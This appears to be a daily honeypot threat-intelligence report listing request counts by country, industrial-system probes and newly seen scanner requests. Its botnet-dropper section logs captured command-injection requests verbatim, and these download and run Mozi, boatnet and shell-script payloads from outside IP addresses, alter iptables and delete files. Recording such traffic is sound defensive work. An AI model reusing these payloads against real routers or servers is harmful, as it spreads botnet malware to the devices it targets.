Table of Contents

Daily Report: 2025-06-15
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

Executive summary
OT report simplified
Botnet dropper behaviour
List of request
List of country_iso_code

executive_summary
#

In today’s repport, we detected 6 stage 1 IP address(es), linked to 6 dropper URL(s).

There are 29 new requests that have never been observed before (these were added to the monitored request database.).

A total of 789 requests were recorded during the day, originating from 6 different countries, with a peak of 254 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_country	targeted_country
US	Germany
KR	Germany
US	Germany
US	Israel
CN	Georgia

botnet_dropper_behaviour
#

remote_addr	request
141.98.11.83	GET /shell?cd+/tmp;wget+http://94.26.90.251/payload1.sh+-O-+
141.98.11.147	GET /shell?cd+/tmp;iptables+-I+INPUT+-p+tcp+-s+141.98.11.147+–dport+5500+-j+ACCEPT;+iptables+-I+INPUT+-p+tcp+–dport+5500+-j+DROP;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/x86;chmod+777+;./x86+x86;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm7;chmod+777+;./arm7+arm7;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm4;chmod+777+;./arm4+arm4;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm5;chmod+777+;./arm5+arm5 HTTP/1.1
103.57.186.120	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.57.186.120:56531/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
5.180.82.34	GET /mail/?_from=%7B%7B%23exec(‘cd%20%2Ftmp%20%7C%7C%20cd%20%2Fvar%2Frun%20%7C%7C%20cd%20%2Fmnt%20%7C%7C%20cd%20%2Froot%20%7C%7C%20cd%20%2F%3B%20wget%20http%3A%2F%2F135.181.31.27%2Fnumpa.sh%3B%20curl%20-O%20http%3A%2F%2F135.181.31.27%2Fnumpa.sh%3B%20chmod%20%2Bx%20%2A%3B%20chmod%20777%20%2A%3B%20sh%20numpa.sh%3B%20.%2Fnumpa.sh%3B%20rm%20-rf%20%2A’)%7D%7D HTTP/1.1
103.48.64.114	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.48.64.114:44882/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
144.172.116.95	POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.150%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

	number_of_occurence	request
85	1	\x00\x0E8\xDDl\x98\xAC\x90\x83\xD6\xBD\x00\x00\x00\x00\x00
95	1	HEAD /mysql-admin/scripts/setup.php HTTP/1.1
103	1	GET /Odin/http/call1749972461 HTTP/1.1
104	1	GET /OdinHttpCall1749972461 HTTP/1.1
105	1	GET /odinhttpcall1749972461 HTTP/1.1
106	1	\x00\x0E8k\x05\x1E\x0B\x03;\xD1\x96\x00\x00\x00\x00\x00
117	1	GET /qEdC HTTP/1.1
118	1	GET /kZAV HTTP/1.1
127	1	HEAD /php-myadmin/scripts/setup.php HTTP/1.1
128	1	HEAD /admin/scripts/setup.php HTTP/1.1
129	1	HEAD /dbadmin/scripts/setup.php HTTP/1.1
145	1	GET /Odin/http/call1749973231 HTTP/1.1
151	1	\x00\x0E8y\xCF\x13\xEE@r\xD5@\x00\x00\x00\x00\x00
154	1	GET /OdinHttpCall1749973231 HTTP/1.1
155	1	GET /odinhttpcall1749973231 HTTP/1.1
156	1	\x00\x0E8\x01\xBB-\x08Q\x9Ah\x1F\x00\x00\x00\x00\x00
157	1	\x00\x0E\x08\x01\xBB-\x08Q\x9Ah\x1F\x00\x00\x00\x00\x00
159	1	\x00\x0E\x08\x96\x07\xC8\xDCc\x82\x5C.\x00\x00\x00\x00\x00
161	1	\x00\x0E8\x96\x07\xC8\xDCc\x82\x5C.\x00\x00\x00\x00\x00
168	1	GET /axis-cgi/mjpg/video.cgi?camera=&resolution=640x480 HTTP/1.1
169	1	GET /mjpg/video.mjpg HTTP/1.1
170	1	GET /coqmjpyqr.jpg HTTP/1.1
178	1	\x00\x0E8C\x9D\x1A\xE3\x8FUB\xE5\x00\x00\x00\x00\x00
179	1	\x00\x0E\x08C\x9D\x1A\xE3\x8FUB\xE5\x00\x00\x00\x00\x00
191	1	GET /o5rF HTTP/1.1
192	1	GET /NSkQ HTTP/1.1
199	1	\x00\x0E8m\x96<pF\xE4\xB3\x9F\x00\x00\x00\x00\x00
202	1	\x00\x0E\x08\xEE\x9Du\xA3R,\x884\x00\x00\x00\x00\x00
203	1	\x00\x0E8\xEE\x9Du\xA3R,\x884\x00\x00\x00\x00\x00

country_iso_code
#

	number_of_occurence	country_iso_code
0	254	US
1	123	DE
2	66	NL
3	41	LT
4	32	JP
5	29	RU
6	27	BG
7	27	PL
8	23	SC
9	23	CN
10	22	HK
11	18	IN
12	12	SG
13	10	GB
14	10	ZA
15	9	NG
16	8	GR
17	8	CA
18	5	FR
19	5	TR
20	4	AO
21	4	ES
22	4	MN
23	3	KZ
24	3	GH
25	2	IE
26	2	TW
27	2	KR
28	2	CH
29	2	IL
30	2	VN
31	1	MC
32	1	UA
33	1	FI
34	1	BE
35	1	IT
36	1	RO
37	1	BR

Report: 2025-06-14

14 June 2025·585 words

Repport Daily

Report: 2025-06-13

13 June 2025·2684 words

Repport Daily

Report: 2025-06-12

12 June 2025·339 words

Repport Daily

	number_of_occurence	country_iso_code
0	254	US
1	123	DE
2	66	NL
3	41	LT
4	32	JP
5	29	RU
6	27	BG
7	27	PL
8	23	SC
9	23	CN
10	22	HK
11	18	IN
12	12	SG
13	10	GB
14	10	ZA
15	9	NG
16	8	GR
17	8	CA
18	5	FR
19	5	TR
20	4	AO
21	4	ES
22	4	MN
23	3	KZ
24	3	GH
25	2	IE
26	2	TW
27	2	KR
28	2	CH
29	2	IL
30	2	VN
31	1	MC
32	1	UA
33	1	FI
34	1	BE
35	1	IT
36	1	RO
37	1	BR

	number_of_occurence	country_iso_code
0	254	US
1	123	DE
2	66	NL
3	41	LT
4	32	JP
5	29	RU
6	27	BG
7	27	PL
8	23	SC
9	23	CN
10	22	HK
11	18	IN
12	12	SG
13	10	GB
14	10	ZA
15	9	NG
16	8	GR
17	8	CA
18	5	FR
19	5	TR
20	4	AO
21	4	ES
22	4	MN
23	3	KZ
24	3	GH
25	2	IE
26	2	TW
27	2	KR
28	2	CH
29	2	IL
30	2	VN
31	1	MC
32	1	UA
33	1	FI
34	1	BE
35	1	IT
36	1	RO
37	1	BR

Daily Report: 2025-06-15#

Executive summary#

executive_summary#

ot_simplified_report#

botnet_dropper_behaviour#

request#

country_iso_code#

Related

Daily Report: 2025-06-15
#

Executive summary
#

executive_summary
#

ot_simplified_report
#

botnet_dropper_behaviour
#

request
#

country_iso_code
#

	number_of_occurence	country_iso_code
0	254	US
1	123	DE
2	66	NL
3	41	LT
4	32	JP
5	29	RU
6	27	BG
7	27	PL
8	23	SC
9	23	CN
10	22	HK
11	18	IN
12	12	SG
13	10	GB
14	10	ZA
15	9	NG
16	8	GR
17	8	CA
18	5	FR
19	5	TR
20	4	AO
21	4	ES
22	4	MN
23	3	KZ
24	3	GH
25	2	IE
26	2	TW
27	2	KR
28	2	CH
29	2	IL
30	2	VN
31	1	MC
32	1	UA
33	1	FI
34	1	BE
35	1	IT
36	1	RO
37	1	BR